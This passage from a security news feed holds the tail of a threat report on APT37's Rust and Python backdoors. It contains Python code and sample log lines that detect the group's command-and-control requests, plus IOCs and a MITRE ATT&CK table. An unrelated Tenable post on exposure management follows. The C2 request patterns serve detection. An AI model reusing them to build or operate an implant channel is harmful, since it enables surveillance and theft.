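198.51.100.7 - - [01/Jan/2025:10:01:00 +0000] "GET /index.php?U=parent HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2025:10:01:05 +0000] "GET /index.php?U=client01&C=cGluZw== HTTP/1.1" 200 0
203.0.113.10 - - [01/Jan/2025:10:02:00 +0000] "POST /index.php?U=client01&_file=watch_2025_01_01-10_00_00.rar HTTP/1.1" 200 0
192.0.2.5 - - [01/Jan/2025:10:03:00 +0000] "GET /about.html HTTP/1.1" 200 2048
"""

# Archive names from Table 5: <prefix>_YYYY_MM_DD-HH_MM_SS.rar (prefix watch, usb, data or a device name)
ARCHIVE_RE = re.compile(r"^[^/\\]+_\d{4}_\d{2}_\d{2}-\d{2}_\d{2}_\d{2}\.rar$")
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify_request(method, path):
    """Map one request to the C2 action it would trigger per Table 6, or None if unrelated."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if "U" not in qs:
        return None
    if qs["U"][0] == "parent":
        return "operator-fetch-results"        # operator drains the parent array
    if method == "GET" and "C" in qs:
        return "operator-queue-command"        # Base64 command stored in the child array
    if method == "POST" and "R" in qs:
        return "implant-post-result"           # Base64 result stored in the parent array
    if method == "POST" and "_file" in qs:
        name = qs["_file"][0]                  # saved on the server under the client's ID prefix
        return "implant-upload-archive" if ARCHIVE_RE.match(name) else "implant-upload-file"
    return "implant-poll"                      # bare U=: implant asking for pending commands

def decode_payload(value):
    """Decode the Base64 text carried in C= and R= so an analyst can read it."""
    return base64.b64decode(value).decode("utf-8", errors="replace")

def triage_log(text):
    """Return (ip, action) for every line whose shape matches the C2 protocol."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        action = classify_request(m["method"], m["path"])
        if action:
            hits.append((m["ip"], action))
    return hits
```

Distinct source addresses for the operator actions and the implant actions, together with uploads whose names match the Table 5 pattern, are the combination worth escalating when reviewing a web server's logs.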
Victim Profile

Our findings revealed that several victims of this attack were located in South Korea. While the exact identities of the victims remain unclear due to limited available information, they do not appear to be associated with enterprises or government organizations. Based on the decoy content employed in the attack, ThreatLabz assesses with medium confidence that the intended targets include individuals linked to the North Korean regime or involved in South Korean political and/or diplomatic affairs.

Conclusion

APT37 continues to prove its adaptability and proficiency by utilizing advanced tools and tactics to achieve its objectives. By incorporating new technologies alongside refined social engineering techniques, the group is able to effectively exfiltrate sensitive information and conduct targeted surveillance on individuals of interest. This malware cluster leveraged by APT37 has demonstrated persistent activity over the years and continues to undergo regular improvements.

Zscaler Coverage

Zscaler’s multilayered cloud security platform detects indicators related to APT37's campaign at various levels.
The figure below depicts the Zscaler Cloud Sandbox, showing detection details for this threat.

Figure 4: Zscaler Cloud Sandbox report for FadeStealer.

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to this threat at various levels with the following threat names:

Win32.Backdoor.Chinotto
Win32.Trojan.Apt37.LZ
Win32.Downloader.FadeStealer

Indicators Of Compromise (IOCs)

MD5 | File name
b9900bef33c6cc9911a5cd7eeda8e093 | N/A
7967156e138a66f3ee1bfce81836d8d0 | 3HNoWZd.exe.bin
77a70e87429c4e552649235a9a2cf11a | wonder.dat
04b5e068e6f0079c2c205a42df8a3a84 | tele.conf
d2b34b8bfafd6b17b1cf931bb3fdd3db | tele.dat
3d6b999d65c775c1d27c8efa615ee520 | 2024-11-22.rar
89986806a298ffd6367cf43f36136311 | Password.chm
4caa44930e5587a0c9914bda9d240acc | 1.html

MITRE ATT&CK Framework

ID | Tactic | Description
T1566.001 | Phishing: Spearphishing Attachment | The threat actor delivers a malicious archive file to victims via spear phishing.
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | The Windows commands are launched by the CHM file when the Chinotto malware is delivered to the victim.
T1059.007 | Command and Scripting Interpreter: JavaScript | The JavaScript-embedded HTA file is launched at the initial stage of the infection.
T1053.005 | Scheduled Task/Job: Scheduled Task | A Windows Task Scheduler entry named MicrosoftUpdate was created for persistence using a malicious shortcut file.
T1204.001 | User Execution: Malicious Link | The malicious Windows shortcut file was delivered to the victim.
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | The malicious CHM file creates a Run registry entry named OnedriveStandaloneUpdater for persistence.
T1055.013 | Process Injection: Process Doppelgänging | Using Python code, the malware injects malicious code into the legitimate process using Windows Transactional NTFS (TxF).
T1036.003 | Masquerading: Rename Legitimate Utilities | The legitimate Python module was renamed as tele_update.exe.
T1036.004 | Masquerading: Masquerade Task or Service | The malware creates Windows services or registry keys that impersonate legitimate services, such as OneDrive or Windows Update.
T1218.005 | System Binary Proxy Execution: Mshta | The malware exploits mshta.exe to execute malicious .hta files as a proxy.
T1056.001 | Input Capture: Keylogging | FadeStealer collects the user's keystrokes.
T1113 | Screen Capture | FadeStealer takes screenshots of the victim’s screen.
T1123 | Audio Capture | FadeStealer records microphone audio.
T1025 | Data from Removable Media | FadeStealer collects files from connected removable media devices.
T1560.001 | Archive Collected Data: Archive via Utility | FadeStealer uses an embedded RAR utility to collect and compress data for exfiltration.
T1071.001 | Application Layer Protocol: Web Protocols | Rustonotto, Chinotto, and FadeStealer use HTTP communication for backdoor operations.
T1132.001 | Data Encoding: Standard Encoding | Rustonotto and Chinotto use Base64 encoding when sending data.
T1041 | Exfiltration Over C2 Channel | FadeStealer exfiltrates collected data through the C2 channel.
The post APT37 Targets Windows with Rust Backdoor and Python Loader appeared first on Security Boulevard.
Each Monday, the Tenable Exposure Management Academy provides the practical, real-world guidance you need to shift from vulnerability management to exposure management. In this post, we look back on the guidance and best practices shared in the past several months. You can read the entire Exposure Management Academy series here.
Let’s look back at key takeaways from the Exposure Management Academy over the past several months, including ones that address:
Consider this question that you’re bound to get several times a week (if not daily): Where are we exposed? To provide an answer, you need a complete understanding of your organization’s attack surface, including all possible entry points that a threat actor could use to launch an attack.
As Aaron Roy wrote in Understanding Your Attack Surface: The Key to Effective Exposure Management, every application, server, cloud instance and employee laptop connected to the internet is a part of that surface. But unlike physical inventory, the digital attack surface is not static. It’s an amorphous and constantly expanding environment that has undergone significant changes in the wake of the move to remote work and the proliferation of connected devices. Plus, every new technology (think cloud, AI and more) forces even more change.
To deal with this, modern security teams have had to quickly adapt. Running periodic vulnerability scans isn’t enough these days.
So, what can you do in the face of this change?
Modern security teams need to take a more holistic approach with a continuous discovery process that maps the entire landscape. That means finding assets you didn’t even know you had, including the ever popular forgotten servers and shadow IT that can become gaping holes in your defenses.
By meticulously identifying and mapping the entire attack surface, cybersecurity teams lay the critical foundation for a strong security program, transforming unknown risks into a manageable and defensible scope. Without this clarity, teams are left chasing shadows, which is a primary driver of the stress and burnout mentioned earlier.
The strategic shift to proactive exposure management

With a clear picture of the attack surface, it’s time to figure out where to focus your defensive efforts. Contributors to the Exposure Management Academy have been clear: there’s been a fundamental shift in mindset from reactive vulnerability patching to proactive exposure management.
For too long, security teams were caught in a cycle of chasing every vulnerability, regardless of severity, which is exhausting and inefficient. Exposure management breaks this cycle with a simple but powerful principle: prioritization over volume.
Robert Huber, Tenable CSO, has written about not trying to fix everything, notably in Turn to Exposure Management to Prioritize Risks Based on Business Impact. As Huber wrote, “Maybe it’s human nature. If there’s a problem — no matter how big or small — some of us are just wired to want to fix it right away and get it off our punch list.” He added: “So treating each one as number-one priority is a surefire shortcut to burnout and inefficiency.”
Reinforcing that point, Patricia Grant wrote in Exposure Management Works When the CIO and CSO Are in Sync that, “The goal isn’t to fix everything. It’s to fix what matters most. Chasing thousands of vulnerabilities without context wastes time and energy. Exposure management helps us shift the conversation from volume to impact.”
That conversation shift enables you to stop chasing your tail and start answering a couple of questions, such as: Is this weakness actually exploitable by an attacker? Is the asset it affects critical to our operations or revenue?
Exposure context and prioritization based on business impact

With exposures linked to real-world business impact, teams can prioritize their work with strategic precision. Instead of producing a report with thousands of low-level vulnerabilities (and a few critical ones buried in the noise), security groups can now confidently highlight the exposures that pose a real, material threat to the organization.
By breaking down the silos that have long plagued security, exposure management provides a unified view of all that security data. As Jorge Orchilles, Senior Director of Readiness and Proactive Security at Verizon, wrote in Exposure Management Is the Future of Proactive Security, this integrated approach enables smarter decisions and a more defensible security posture. It also changes the conversations at the executive level.
Added Orchilles: “Instead of delivering long lists of vulnerabilities that mean little to non-technical leaders, we can present a clear picture in a few key points:
And when a major vulnerability hits, we don’t have to scramble to figure out if we are affected. We have the data at our fingertips.” That state of readiness, which replaces panic with process, is the ultimate antidote to reactionary stress.
Fostering a culture of shared responsibility for exposure management

A truly effective security program certainly uses technology, but it’s built on a foundation of people and partnership. As a cybersecurity professional, you probably understand that better than anyone. And, if you’re a leader, you are probably increasingly focused on building a durable culture of security throughout your organization, with a critical theme: security is a shared responsibility.
More than ever, leaders and practitioners alike have to focus on education, empowerment and collaboration.
As Patricia Grant wrote, “At Tenable, we’ve taken a firm stance: when a zero-day emerges, patch your device within 24 hours or it’ll be automatically locked.”
Then she added: “But security doesn’t stop at the office door. No matter where employees are, they’re part of the defense. That’s why we focus on education — not to slow people down, but to empower them to keep the business safe.”
Grant is breaking down the walls between IT, security and business units. She’s fostering the teamwork the company needs to be resilient. This requires some soft skills, an often-overlooked part of the job. That means showing colleagues how security makes their jobs easier, not harder.
As Jorge Orchilles wrote, “Security teams accustomed to working in silos must now share data and decision-making, which can be a tough adjustment. I found that the key to overcoming this is transparency and partnership. In fact, reading a bit of Dale Carnegie regularly can be just as important as a daily dose of Brian Krebs.”
By bringing everyone into the process, the folks who do the cybersecurity work will ensure that security isn’t something that is done to the organization. Instead, security can transform into what it should be: a shared mission, shaped and supported by everyone in the organization.
What do you think?

You’ve heard from us. We’d love to hear from you:
Share your feedback. We’ll keep it anonymous.
The post ICYMI: Exposure Management Academy on Attack Surface Management, Proactive Security and More appeared first on Security Boulevard.